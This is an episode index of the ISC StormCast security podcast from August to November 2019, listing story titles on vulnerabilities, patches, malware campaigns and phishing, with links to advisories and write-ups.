Oracle Payday Vulnerabilities Exploited https://www.onapsis.com/blog/oracle-payday-vulnerabilities
Google Chrome Update https://chromereleases.googleblog.com/2019/11/stable-channel-update-for-desktop_18.html
NSA Publishes Guide About the Risks of Inspecting TLS https://media.defense.gov/2019/Nov/18/2002212783/-1/-1/0/MANAGING%20RISK%20FROM%20TLS%20INSPECTION_20191106.PDF
Unbound Command Execution Vulnerability https://nlnetlabs.nl/projects/unbound/security-advisories/#vulnerability-in-ipsec-module
11/21/2019 6 minutes, 7 seconds

ISC StormCast for Wednesday, November 20th 2019

JAWS DVR Bot https://isc.sans.edu/forums/diary/Cheap+Chinese+JAWS+of+DVR+Exploitability+on+Port+60001/25530/
TianFu Cup https://twitter.com/TianfuCup
Microsoft Access Hotfix https://support.microsoft.com/en-us/help/4484198/november-18-2019-update-for-office-2016-kb4484198
Windows 10 DNS over HTTPS https://techcommunity.microsoft.com/t5/Networking-Blog/Windows-will-improve-user-privacy-with-DNS-over-HTTPS/ba-p/1014229
Android Camera Permission Mixup https://www.checkmarx.com/blog/how-attackers-could-hijack-your-android-camera
11/20/2019 6 minutes, 23 seconds

ISC StormCast for Tuesday, November 19th 2019

Carriers Filter SMS Messages Sent By Applications https://isc.sans.edu/forums/diary/SMS+and+2FA+Another+Reason+to+Move+away+from+It/25526/
Intel Removing BIOS Downloads for EOL Hardware https://www.vogons.org/viewtopic.php?f=46&t=69184 https://news.ycombinator.com/item?id=21563309
Outlook 365 Remains Top Phishing Target https://info.phishlabs.com/blog/active-office-365-phishing-campaign-targeting-admin-credentials
11/19/2019 5 minutes, 38 seconds

ISC StormCast for Monday, November 18th 2019

TPM Fail Update https://downloadcenter.intel.com/download/28632 https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00241.html
Office November Update Issues https://borncity.com/win/2019/11/13/office-november-2019-updates-are-causing-access-error-3340/
WhatsApp Stack Based Buffer Overflow https://nvd.nist.gov/vuln/detail/CVE-2019-11931
Android Qualcomm Data Exfiltration Bug https://research.checkpoint.com/the-road-to-qualcomm-trustzone-apps-fuzzing/
Nextcloud Ransomware NextCry https://www.bleepingcomputer.com/news/security/new-nextcry-ransomware-encrypts-data-on-nextcloud-linux-servers/
11/18/2019 5 minutes, 55 seconds

ISC StormCast for Friday, November 15th 2019

LokiBot Update (November 2019) https://isc.sans.edu/forums/diary/An+example+of+malspam+pushing+Lokibot+malware+November+2019/25518/
Some Packet-Fu with Zeek https://isc.sans.edu/forums/diary/Some+packetfu+with+Zeek+previously+known+as+bro/25510/
TPM Leaks http://tpm.fail/
Zombieload 2.0 Vulnerability https://zombieloadattack.com/
11/15/2019 7 minutes, 15 seconds

ISC StormCast for Wednesday, November 13th 2019

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/November+2019+Microsoft+Patch+Tuesday/25516/
Adobe Update https://helpx.adobe.com/security.html
Facebook Camera Bug https://www.cnet.com/news/facebook-bug-has-camera-activated-while-people-are-using-the-app
McAfee Antivirus Bypass and Persistence https://safebreach.com/Post/McAfee-All-Editions-MTP-AVP-MIS-Self-Defense-Bypass-and-Potential-Usages-CVE-2019-3648
11/13/2019 6 minutes, 44 seconds

ISC StormCast for Tuesday, November 12th 2019

Are We Going Back to TheMoon And How is Liquor Involved https://isc.sans.edu/forums/diary/Are+We+Going+Back+to+TheMoon+and+How+is+Liquor+Involved/25512/
New Update for Magento Shopping Cart https://magento.com/security/patches/latest-magento-security-update-helps-protect-recently-reported-rce-vulnerability https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update
ZoneAlarm vBulletin Forum Breached https://thehackernews.com/2019/11/zonealarm-forum-data-breach.html
CSS Injection in Slack to Log Keystrokes https://fletchto99.dev/2019/november/slack-vulnerability/
11/12/2019 5 minutes, 45 seconds

ISC StormCast for Monday, November 11th 2019

Microsoft Applications Diverted from Their Main Use https://isc.sans.edu/forums/diary/Microsoft+Apps+Diverted+from+Their+Main+Use/25502/
Did BlueKeep Malware Affect Patching https://isc.sans.edu/forums/diary/Did+the+recent+malicious+BlueKeep+campaign+have+any+positive+impact+when+it+comes+to+patching/25506/
Pwn2Own Summary https://www.zerodayinitiative.com/blog/2019/11/7/pwn2own-tokyo-2019-day-two-final-results
State of JavaScript Framework Security https://snyk.io/wp-content/uploads/snyk-javascript_report_2019.pdf
DShield/ISC Honeypot Update https://isc.sans.edu/honeypot.html
11/11/2019 6 minutes, 46 seconds

ISC StormCast for Friday, November 8th 2019

Adobe Mobile SDK Update Fixes TLS Defaults https://wwws.nightwatchcybersecurity.com/2019/11/06/insecure-defaults-in-adobes-mobile-sdks/
QNAP Updates QSnatch Advisory https://www.qnap.com/en/security-advisory/nas-201911-01
Double-Loaded ZIP File Delivers Malware https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/double-loaded-zip-file-delivers-nanocore/
Ring Video Doorbell Leaks Wi-Fi Password https://labs.bitdefender.com/2019/11/ring-video-doorbell-pro-under-the-scope/
11/8/2019 6 minutes, 33 seconds

ISC StormCast for Thursday, November 7th 2019

Google Improving PlayStore Security With Partners https://security.googleblog.com/2019/11/the-app-defense-alliance-bringing.html
Xen Security Advisories https://xenbits.xen.org/xsa/
npcap pool corruption vulnerability https://github.com/nmap/nmap/issues/1568
TrendMicro Employee Selling Customer Data to Tech Support Scammers https://blog.trendmicro.com/trend-micro-discloses-insider-threat-impacting-some-of-its-consumer-customers/
SANS Security Awareness Newsletter https://www.sans.org/security-awareness-training/resources/shopping-online-securely-1
11/7/2019 5 minutes, 19 seconds

ISC StormCast for Wednesday, November 6th 2019

Formbook Malspam https://isc.sans.edu/forums/diary/Malspam+pushing+Formbook+info+stealer/23387/
Honeypot Update https://github.com/DShield-ISC/dshield
Office on Mac XLM Macros https://kb.cert.org/vuls/id/125336/
Firefox Browser Lock Bug Exploited https://bugzilla.mozilla.org/show_bug.cgi?id=1593795
libarchive use after free vulnerability https://medium.com/@social_62682/new-libarchive-use-after-free-vulnerability-36c4b141fe89
11/6/2019 6 minutes, 22 seconds

ISC StormCast for Tuesday, November 5th 2019

ClamAV Vulnerability https://twitter.com/hackerfantastic/status/1190685521153937408 https://pastebin.com/cfP7X89m
Xcode Vulnerability https://support.apple.com/en-is/HT210729
MikroTik DNS Cache Poisoning https://blog.mikrotik.com/security/dns-cache-poisoning-vulnerability.html
11/5/2019 6 minutes, 18 seconds

ISC StormCast for Monday, November 4th 2019

Critical Google Chrome Update Fixes Exploited Vulnerability https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html
BlueKeep Vulnerability Mass Exploited to Install Crypto Coin Miner https://www.kryptoslogic.com/blog/2019/11/bluekeep-cve-2019-0708-exploitation-spotted-in-the-wild/
rConfig Vulnerabilities https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/
11/4/2019 5 minutes, 59 seconds

ISC StormCast for Friday, November 1st 2019

Phishing Made Easy With EML Files and Outlook 365 https://isc.sans.edu/forums/diary/EML+attachments+in+O365+a+recipe+for+phishing/25474/
Microsoft TLS Security Enhancements Lead to Timeouts https://support.microsoft.com/en-us/help/4528489/transport-layer-security-tls-connections-might-intermittently-fail-or
MESSAGETAP: Who's Reading Your Text Messages https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html
Amazon Authentication Failure for 3rd Party Devices https://old.reddit.com/r/sysadmin/comments/dpbt3t/the_perils_of_security_and_how_i_finally_resolved/
11/1/2019 5 minutes, 52 seconds

ISC StormCast for Thursday, October 31st 2019

Apple Security Updates Details Released https://support.apple.com/en-us/HT201222
Untitled Goose Deserialization https://pulsesecurity.co.nz/advisories/untitled-goose-game-deserialization
Insecure Pagers Leak Medical Data https://techcrunch.com/2019/10/30/nhs-pagers-medical-health-data/
Kibana Vulnerability https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/
10/31/2019 6 minutes, 34 seconds

ISC StormCast for Wednesday, October 30th 2019

xHelper Android Malware https://www.symantec.com/blogs/threat-intelligence/xhelper-android-malware
Counter-Strike Game Keys Used for Money Laundering https://blog.counter-strike.net/index.php/2019/10/26113/
Generating PCAP Files From YAML https://isc.sans.edu/forums/diary/Generating+PCAP+Files+from+YAML/25464/
10/30/2019 5 minutes, 36 seconds

ISC StormCast for Tuesday, October 29th 2019

PHP 7 Remote Code Execution Vulnerability Exploited https://lab.wallarm.com/php-remote-code-execution-0-day-discovered-in-real-world-ctf-exercise/ https://github.com/neex/phuip-fpizdam
Finding Shellcode with scdbg https://isc.sans.edu/forums/diary/Using+scdbg+to+Find+Shellcode/25460/
Apple iOS / tvOS / Safari Updates https://support.apple.com/en-us/HT201222
Sextortion Attempts Are Targeting Blogs https://www.bleepingcomputer.com/news/security/blogger-and-wordpress-sites-hacked-to-show-sextortion-scams/
10/29/2019 4 minutes, 49 seconds

ISC StormCast for Monday, October 28th 2019

Odd Double Base64 Encoded "BS_REAL_IP" Header https://isc.sans.edu/forums/diary/Unusual+Activity+with+Double+Base64+Encoding/25458/
DNS Archeology With PowerShell https://isc.sans.edu/forums/diary/More+on+DNS+Archeology+with+PowerShell/25452/
iOS Appstore Malware https://www.wandera.com/mobile-security/ios-trojan-malware/
British Law Enforcement Misses Malware Reports Due to Anti-Malware https://www.theregister.co.uk/2019/10/24/hmicfrs_report_cyber_crime/
10/28/2019, 5 minutes, 49 seconds

ISC StormCast for Friday, October 25th 2019

XML External Entity Vuln in LSP4XML Affects Various Developer Tools https://www.shielder.it/blog/dont-open-that-xml-xxe-to-rce-in-xml-plugins-for-vs-code-eclipse-theia/?preview=true
Google Chrome Will Make "SameSite" Default https://blog.chromium.org/2019/10/developers-get-ready-for-new.html
Leftover Gigamon Configurations https://isc.sans.edu/forums/diary/Your+Supply+Chain+Doesnt+End+At+Receiving+How+Do+You+Decommission+Network+Equipment/25448/
10/25/2019, 6 minutes, 55 seconds

ISC StormCast for Thursday, October 24th 2019

FTC Issues SIM Swapping Guidance https://www.consumer.ftc.gov/blog/2019/10/sim-swap-scams-how-protect-yourself
Discord Used as Info Stealer Backdoor https://www.bleepingcomputer.com/news/security/discord-turned-into-an-info-stealing-backdoor-by-new-malware/
Cisco Exploit Code https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190828-iosxe-rest-auth-bypass
Tails 4.0 Released https://tails.boum.org/news/version_4.0/index.en.html
10/24/2019, 5 minutes, 3 seconds

ISC StormCast for Wednesday, October 23rd 2019

Testing TLS 1.3 And Supported Ciphers https://isc.sans.edu/forums/diary/Testing+TLSv13+and+supported+ciphers/25442/
Google Chrome 78 Released https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_22.html
Firefox 70 Released https://www.mozilla.org/en-US/firefox/70.0/releasenotes/
Cache Poisoning DoS https://cpdos.org/
10/23/2019, 7 minutes, 9 seconds

ISC StormCast for Tuesday, October 22nd 2019

DNS over TLS Scans https://isc.sans.edu/forums/diary/Whats+up+with+TCP+853+DNS+over+TLS/25438/
NordVPN and Others Compromised https://techcrunch.com/2019/10/21/nordvpn-confirms-it-was-hacked/ https://twitter.com/hexdefined/status/1186106695073726466
Trend Micro Bypass http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-ANTI-THREAT-TOOLKIT-(ATTK)-REMOTE-CODE-EXECUTION.txt
Realtek Linux Wifi Driver Buffer Overflow https://twitter.com/nicowaisman/status/1184864519316758535
10/22/2019, 5 minutes, 41 seconds

ISC StormCast for Monday, October 21st 2019

Attacks Against NVMS-9000 DVR Web Vulnerability https://isc.sans.edu/forums/diary/Scanning+Activity+for+NVMS9000+Digital+Video+Recorder/25434/
Pixel 4 Face Unlock Works with Eyes Shut https://www.bbc.com/news/technology-50085630
Samsung Galaxy S10 Fingerprint Unlock Bug https://www.bbc.com/news/technology-50080586
Alexa/Google Home Phishing https://srlabs.de/bites/smart-spies/
10/21/2019, 6 minutes, 52 seconds

ISC StormCast for Friday, October 18th 2019

Phishing E-Mail Spoofing SPF Protected Domain https://isc.sans.edu/forums/diary/Phishing+email+spoofing+SPFenabled+domain/25426/
Purchased Domain Arrives with Paypal Accounts Linked to it https://www.theregister.co.uk/2019/10/17/paypal_account_domain/
Typosquatting Attacks Affect 2020 Presidential Election https://www.digitalshadows.com/blog-and-research/typosquatting-and-the-2020-u-s-presidential-election/
STI Student: Christopher Hurless, Exploring Osquery, Fleet, and Elastic Stack as an Open-source Solution to Endpoint Detection and Response https://www.sans.org/reading-room/whitepapers/detection/paper/39165
10/18/2019, 16 minutes, 41 seconds

ISC StormCast for Thursday, October 17th 2019

Oracle CPU https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html
Jackson-Databind Vulnerability https://github.com/FasterXML/jackson-databind/issues/2387
VMware Cloud Foundation and VMware Harbor Container Registry Patch https://www.vmware.com/security/advisories/VMSA-2019-0016.html
WordPress Update https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
Cryptominers Hiding in WAV Files https://threatvector.cylance.com/en_us/home/malicious-payloads-hiding-beneath-the-wav.html
10/17/2019, 5 minutes, 31 seconds

ISC StormCast for Wednesday, October 16th 2019

Adobe Updates https://helpx.adobe.com/security.html
Symantec BSOD https://support.symantec.com/us/en/article.TECH256643.html
OSX/Shlayer Bypasses Gatekeeper/XProtect https://blog.confiant.com/osx-shlayer-new-shurprise-unveiling-osx-tarmac-f965a32de887
Fake iOS Jailbreak Leads to Clickfraud https://blog.talosintelligence.com/2019/10/checkrain-click-fraud.html
10/16/2019, 5 minutes, 29 seconds

ISC StormCast for Tuesday, October 15th 2019

sudo vulnerability https://www.sudo.ws/alerts/minus_1_uid.html
Apple Safebrowsing Controversy https://blog.cryptographyengineering.com/2019/10/13/dear-apple-safe-browsing-might-not-be-that-safe/
Streaming Service Tracking Behaviour https://www.princeton.edu/~pmittal/publications/tv-tracking-ccs19.pdf
10/15/2019, 6 minutes, 3 seconds

ISC StormCast for Monday, October 14th 2019

YARA Update https://isc.sans.edu/forums/diary/YARA+v3110+released/25408/
Hacking Back Against Ransomware https://www.zdnet.com/article/white-hat-hacks-muhstik-ransomware-gang-and-releases-decryption-keys/
Fake Crypto Trading Software https://www.bleepingcomputer.com/news/security/attackers-create-elaborate-crypto-trading-scheme-to-install-malware/
10/14/2019, 3 minutes, 37 seconds

ISC StormCast for Friday, October 11th 2019

Mining Live Networks for OUI Data Oddness https://isc.sans.edu/forums/diary/Mining+Live+Networks+for+OUI+Data+Oddness/25404/
iTerm2 Vulnerability https://groups.google.com/forum/#!topic/iterm2-discuss/57k_AuLdQa4
Apple Updater Exploited in Bitpaymer Campaign https://blog.morphisec.com/apple-zero-day-exploited-in-bitpaymer-campaign
10/11/2019, 6 minutes, 14 seconds

ISC StormCast for Thursday, October 10th 2019

What Data Does Vidar Malware Steal https://isc.sans.edu/forums/diary/What+data+does+Vidar+malware+steal+from+an+infected+host/25398/
NTLM MIC Bypass https://www.preempt.com/blog/drop-the-mic-2-active-directory-open-to-more-ntlm-attacks/
Threats on Google Play https://news.drweb.com/show/review/?i=13446#google
10/10/2019, 5 minutes, 35 seconds

ISC StormCast for Wednesday, October 9th 2019

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+October+2019+Patch+Tuesday/25396/
Android Update https://source.android.com/security/bulletin/2019-10-01
vBulletin Update https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4423646-vbulletin-5-5-x-5-5-2-5-5-3-and-5-5-4-security-patch-level-2
10/9/2019, 5 minutes, 22 seconds

ISC StormCast for Tuesday, October 8th 2019

Cloudflare Warp + NordVPN on iOS Leads to Traffic in the Clear https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/
WhatsApp Bug https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/
MacOS Catalina and Safari Update Released https://www.macrumors.com/2019/10/07/apple-releases-macos-catalina/ https://support.apple.com/en-us/HT201222 (nothing new yet)
Magecart Still Going Strong https://www.theregister.co.uk/2019/10/04/magecart/ (original RiskIQ report requires registration)
10/8/2019, 6 minutes

ISC StormCast for Monday, October 7th 2019

visNetwork for Network Data https://isc.sans.edu/forums/diary/visNetwork+for+Network+Data/25390/
Android Priv. Escalation Vulnerability Exploited in the Wild https://bugs.chromium.org/p/project-zero/issues/detail?id=1942
Signal Eavesdropping Vulnerability https://bugs.chromium.org/p/project-zero/issues/detail?id=1943
10/7/2019, 5 minutes, 18 seconds

ISC StormCast for Friday, October 4th 2019

LostFiles Ransomware is Back With New Ruse https://isc.sans.edu/forums/diary/LostFiles+Ransomware/25382/
tcpdump vulnerabilities https://www.tcpdump.org/tcpdump-changes.txt
TLS Manipulating Malware https://securelist.com/compfun-successor-reductor/93633/
Luasz Cyra: Pass the Hash in Windows 10 https://www.sans.org/reading-room/whitepapers/testing/paper/39170
10/4/2019, 15 minutes, 10 seconds

ISC StormCast for Thursday, October 3rd 2019

Latest Emotet News https://isc.sans.edu/forums/diary/A+recent+example+of+Emotet+malspam/25378/
SANS Ouch! Newsletter https://www.sans.org/security-awareness-training/resources/four-simple-steps-staying-secure
XPdf and Foxit Updates https://www.foxitsoftware.com/support/security-bulletins.php https://forum.xpdfreader.com/viewtopic.php?f=3&t=41885
eFax Malspam https://www.heise.de/security/meldung/Achtung-Angebliches-eFax-birgt-Trojaner-4544386.html
Office 365 Idle Timeout https://docs.microsoft.com/en-us/sharepoint/sign-out-inactive-users https://www.microsoft.com/en-us/microsoft-365/roadmap?filters=&searchterms=55183
10/3/2019, 5 minutes, 18 seconds

ISC StormCast for Wednesday, October 2nd 2019

PDF Encryption Flaw https://web-in-security.blogspot.com/2019/09/pdfex-major-security-flaws-in-pdf.html
Windows 7 Security Updates Beyond 2020 https://www.microsoft.com/en-us/microsoft-365/blog/2019/10/01/windows-small-midsize-businesses-stay-secure-current/
ODT Documents Used to Distribute Malware https://blog.talosintelligence.com/2019/09/odt-malware-twist.html
10/2/2019, 6 minutes, 4 seconds

ISC StormCast for Tuesday, October 1st 2019

Maldoc, PowerShell and BITS https://isc.sans.edu/forums/diary/Maldoc+PowerShell+BITS/25372/
Yet Another Critical Exim Flaw https://nvd.nist.gov/vuln/detail/CVE-2019-16928
Cisco Introduces Semiannual Patch Day https://tools.cisco.com/security/center/viewErp.x?alertId=ERP-72547
Windows Server 2019 to Make it Easier to Disable Legacy TLS Versions https://www.microsoft.com/security/blog/2019/09/30/tls-version-enforcement-capabilities-now-available-certificate-binding-windows-server-2019
10/1/2019, 4 minutes, 51 seconds

ISC StormCast for Monday, September 30th 2019

Polycom Scans https://isc.sans.edu/forums/diary/New+Scans+for+Polycom+Autoconfiguration+Files/25366/
Apple Security Details https://support.apple.com/en-us/HT201222
iOS Jailbreak https://github.com/axi0mX/ipwndfu
9/30/2019, 5 minutes, 52 seconds

ISC StormCast for Friday, September 27th 2019

vBulletin Botnet https://twitter.com/bad_packets/status/1177256656322695168
Cisco Industrial Router Security Bulletin https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190925-ios-gos-auth
Sniffle Bluetooth Sniffer https://github.com/nccgroup/sniffle
Outlook on the web blocking more extensions https://techcommunity.microsoft.com/t5/Exchange-Team-Blog/Changes-to-File-Types-Blocked-in-Outlook-on-the-web/ba-p/874451
9/27/2019, 5 minutes, 39 seconds

ISC StormCast for Thursday, September 26th 2019

Malspam Pushing Quasar RAT https://isc.sans.edu/forums/diary/Malspam+pushing+Quasar+RAT/25354/
vBulletin 0-Day Exploit Update https://www.bleepingcomputer.com/news/security/vbulletin-zero-day-exploited-for-years-gets-unofficial-patch/
Fake Veteran Employment Site https://blog.talosintelligence.com/2019/09/tortoiseshell-fake-veterans.html
9/26/2019, 4 minutes, 35 seconds

ISC StormCast for Wednesday, September 25th 2019

Remotewebaccess.com Domain in Certificate Transparency Logs https://isc.sans.edu/forums/diary/Huge+Amount+of+remotewebaccesscom+Sites+Found+in+Certificate+Transparency+Logs/25352/
Adobe Releases Emergency ColdFusion Patch https://blogs.adobe.com/psirt/?p=1789
Apple Releases Additional Updates for iOS/iPadOS https://support.apple.com/en-us/HT201222
vBulletin Vulnerability 0-Day Exploit Released https://seclists.org/fulldisclosure/2019/Sep/31
9/25/2019, 5 minutes, 23 seconds

ISC StormCast for Tuesday, September 24th 2019

Microsoft Releases Special Patch for Exploited Vulnerability in Internet Explorer https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1367
Cloudflare Adding "Bot Fight" option https://blog.cloudflare.com/cleaning-up-bad-bots/
iOS Bluetooth Access Feature https://www.theverge.com/2019/9/19/20867286/ios-13-bluetooth-permission-privacy-feature-apps
Forcepoint VPN Update https://support.forcepoint.com/KBArticle?id=000017525
9/24/2019, 5 minutes, 30 seconds

ISC StormCast for Monday, September 23rd 2019

Popular Android Selfie Apps Act as Adware https://www.wandera.com/mobile-security/google-play-adware/
Wireshark Update https://www.wireshark.org/docs/relnotes/wireshark-3.0.5.html
Harbor Privilege Escalation https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/
9/23/2019, 5 minutes, 29 seconds

ISC StormCast for Friday, September 20th 2019

Agent Tesla https://isc.sans.edu/forums/diary/Agent+Tesla+Trojan+Abusing+Corporate+Email+Accounts/25336/
Apple Updates https://support.apple.com/en-us/HT201222 https://developer.apple.com/documentation/safari_release_notes/safari_13_release_notes
SAMBA 4.11 Released https://www.samba.org/samba/history/samba-4.11.0.html
GitHub Security Updates https://github.blog/2019-09-18-securing-software-together/
9/20/2019, 5 minutes, 8 seconds

ISC StormCast for Thursday, September 19th 2019

Analyzing a Current Emotet Sample https://isc.sans.edu/forums/diary/Emotet+malspam+is+back/25330/
Windows Defender "Scan Now" Failed Bug Fix https://www.bleepingcomputer.com/news/microsoft/windows-defender-antivirus-scans-broken-after-new-update/ https://borncity.com/win/2019/09/18/defender-antimalware-version-4-18-1908-7-released/
QEMU Vulnerability https://www.openwall.com/lists/oss-security/2019/09/17/1
VMware Vulnerability https://blogs.vmware.com/security/2019/09/amd-display-driver-security-updates-address-cve-2019-5685.html
New CWE Top 25 Released https://cwe.mitre.org/top25/archive/2019/2019_cwe_top25.html
9/19/2019, 6 minutes, 16 seconds

ISC StormCast for Wednesday, September 18th 2019

Investigating Gaps in Windows Event Logs https://isc.sans.edu/forums/diary/Investigating+Gaps+in+your+Windows+Event+Logs/25328/
SOHOpelessly Broken 2 https://www.securityevaluators.com/whitepaper/sohopelessly-broken-2/
HP Printer Privacy https://robertheaton.com/2019/09/15/hp-printers-send-data-on-what-you-print-back-to-hp/
9/18/2019, 5 minutes, 52 seconds

ISC StormCast for Tuesday, September 17th 2019

Encrypted Sextortion https://isc.sans.edu/forums/diary/Encrypted+Sextortion+PDFs/25324/
SimJacker https://www.adaptivemobile.com/blog/simjacker-next-generation-spying-over-mobile
LastPass Password Leak https://bugs.chromium.org/p/project-zero/issues/detail?id=1930
Microsoft Extends EoL For Exchange Server 2010 https://techcommunity.microsoft.com/t5/Exchange-Team-Blog/Microsoft-Extending-End-of-Support-for-Exchange-Server-2010-to/ba-p/753591
9/17/2019, 6 minutes, 36 seconds

ISC StormCast for Monday, September 16th 2019

Rig Exploit Kit Delivering VBScript https://isc.sans.edu/forums/diary/Rig+Exploit+Kit+Delivering+VBScript/25318/
Pentesters Arrested During Physical Access Pentest https://arstechnica.com/information-technology/2019/09/check-the-scope-pen-testers-nabbed-jailed-in-iowa-courthouse-break-in-attempt/
iOS Lock Screen Unlock Vulnerability https://www.theregister.co.uk/2019/09/12/apples_ios_lock_workaround/
9/16/2019, 6 minutes, 10 seconds

ISC StormCast for Wednesday, September 11th 2019

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+September+2019+Patch+Tuesday/25310/
Adobe Patches https://helpx.adobe.com/security.html
Intel SSH Side Channel Vulnerability https://www.vusec.net/projects/netcat/ https://www.cs.vu.nl/~herbertb/download/papers/netcat_sp20.pdf
9/11/2019, 5 minutes, 29 seconds

ISC StormCast for Tuesday, September 10th 2019

Firefox to Enable DNS over HTTPS by Default in September https://blog.mozilla.org/futurereleases/2019/09/06/whats-next-in-making-dns-over-https-the-default/ Telegram Fixes Privacy Bug https://www.inputzero.io/2019/09/telegram-privacy-fails-again.html PsiXBot Uses DoH https://www.proofpoint.com/us/threat-insight/post/psixbot-now-using-google-dns-over-https-and-possible-new-sexploitation-module
9/10/2019 - 6 minutes, 26 seconds
Episode Artwork

ISC StormCast for Monday, September 9th 2019

Unidentified Scanning Activity Likely Associated with Mirai/Successors https://isc.sans.edu/forums/diary/Unidentified+Scanning+Activity/25304/ Bluekeep Exploit Now in Metasploit https://blog.rapid7.com/2019/09/06/initial-metasploit-exploit-module-for-bluekeep-cve-2019-0708/ How to Remove Gmail Calendar Spam https://support.google.com/calendar/answer/6084018?co=GENIE.Platform%3DDesktop&hl=en Exim SNI TLS Vulnerability https://exim.org/static/doc/security/CVE-2019-15846.txt
9/9/2019 - 4 minutes, 49 seconds
Episode Artwork

ISC StormCast for Wednesday, September 4th 2019

Tricky Link Retrieves Trick Bot https://isc.sans.edu/forums/diary/Guest+Diary+Tricky+LNK+points+to+TrickBot/25290/ Supermicro Virtual USB Vulnerability https://eclypsium.com/2019/09/03/usbanywhere-bmc-vulnerability-opens-servers-to-remote-attack/ Facebook Free Basics Key Used to Sign Unrelated Android Apps https://www.androidpolice.com/2019/08/29/cryptographic-key-used-to-sign-one-of-facebooks-android-apps-compromised/
9/4/2019 - 5 minutes, 59 seconds
Episode Artwork

ISC StormCast for Tuesday, September 3rd 2019

Malware Installs Node.js https://isc.sans.edu/forums/diary/Malware+Dropping+a+Local+Nodejs+Instance/25284/ Dovecot and PigeonHole Vulnerability https://www.openwall.com/lists/oss-security/2019/08/28/3 Cloudflare Workers Spreading Malware https://medium.com/@marcelx/threat-actor-behind-astaroth-is-now-using-cloudflare-workers-to-bypass-your-security-solutions-2c658d08f4c
9/3/2019 - 4 minutes, 42 seconds
Episode Artwork

ISC StormCast for Monday, September 2nd 2019

iOS Exploits in the Wild https://googleprojectzero.blogspot.com/2019/08/a-very-deep-dive-into-ios-exploit.html Twitter CEO's Twitter Account Hijacked https://twitter.com/TwitterComms/status/1167528672523210752
9/2/2019 - 5 minutes, 18 seconds
Episode Artwork

ISC StormCast for Friday, August 30th 2019

Malware Samples Compiling Their Next Stage On Premise https://isc.sans.edu/forums/diary/Malware+Samples+Compiling+Their+Next+Stage+on+Premise/25278/ CERT-Bund Attempts to Notify Users of Vulnerable Home Automation Systems https://www.heise.de/security/meldung/CERT-Bund-warnt-vor-offenen-Smarthome-Systemen-4509977.html French Authorities Shut Down Coinminer Botnet https://decoded.avast.io/janvojtesek/putting-an-end-to-retadup-a-malicious-worm-that-infected-hundreds-of-thousands/
8/30/2019 - 6 minutes, 24 seconds
Episode Artwork

ISC StormCast for Thursday, August 29th 2019

Open Redirects: A Small But Very Common Vulnerability https://isc.sans.edu/forums/diary/Guest+Diary+Open+Redirect+A+Small+But+Very+Common+Vulnerability/25276/ CamScanner Malicious Download Component https://securelist.com/dropper-in-google-play/92496/ Ares ADB Botnet https://www.wootcloud.com/blogs/ars_botnet.html Cisco REST API Container for IOS XE Authentication Bypass https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190828-iosxe-rest-auth-bypass
8/29/2019 - 5 minutes, 55 seconds
Episode Artwork

ISC StormCast for Wednesday, August 28th 2019

Is it "Safe" To Require TLS 1.2 for Email https://isc.sans.edu/forums/diary/Is+it+Safe+to+Require+TLS+12+for+EMail/25270/ Android Trojan Infects Tens of Thousands of Devices in 4 Months https://www.bleepingcomputer.com/news/security/android-trojan-infects-tens-of-thousands-of-devices-in-4-months/ LYCEUM Threat Group Targeting Middle East https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign
8/28/2019 - 6 minutes, 40 seconds
Episode Artwork

ISC StormCast for Tuesday, August 27th 2019

Apple Patches Jailbreak Vulnerability https://support.apple.com/en-us/HT210549 Scanning for Pulse Secure VPN Endpoints https://badpackets.net/over-14500-pulse-secure-vpn-endpoints-vulnerable-to-cve-2019-11510/ Emotet is Back https://www.bleepingcomputer.com/news/security/emotet-botnet-is-back-servers-active-across-the-world/
8/27/2019 - 4 minutes, 55 seconds
Episode Artwork

ISC StormCast for Monday, August 26th 2019

Simple Mimikatz And RDPWrapper Dropper https://isc.sans.edu/forums/diary/Simple+Mimikatz+RDPWrapper+Dropper/25262/ Malware Impersonating IRS https://www.irs.gov/newsroom/security-summit-warns-of-new-irs-impersonation-email-scam-reminds-taxpayers-the-irs-does-not-send-unsolicited-emails Instagram Phishing with 2FA Codes https://nakedsecurity.sophos.com/2019/08/23/instagram-phishing-uses-2fa-as-a-lure/ GitHub Adding WebAuthn Support https://www.theregister.co.uk/2019/08/23/github_upgrades_its_twofactor_authentication_with_webauthn_support/ Lenovo Solution Center Privilege Escalation https://www.pentestpartners.com/security-blog/privesc-in-lenovo-solution-centre-10-minutes-later/
8/26/2019 - 5 minutes, 22 seconds
Episode Artwork

ISC StormCast for Friday, August 23rd 2019

Steam Zero Days and Bug Bounty Controversy https://www.theregister.co.uk/2019/08/22/valve_bug_bounty_steam_u_turn/ bb-builder malicious npm Package https://blog.reversinglabs.com/blog/the-npm-package-that-walked-away-with-all-your-passwords Phishers Customize Branded Microsoft 365 Login Pages https://www.bleepingcomputer.com/news/security/phishing-attacks-scrape-branded-microsoft-365-login-pages/
8/23/2019 - 5 minutes, 49 seconds
Episode Artwork

ISC StormCast for Thursday, August 22nd 2019

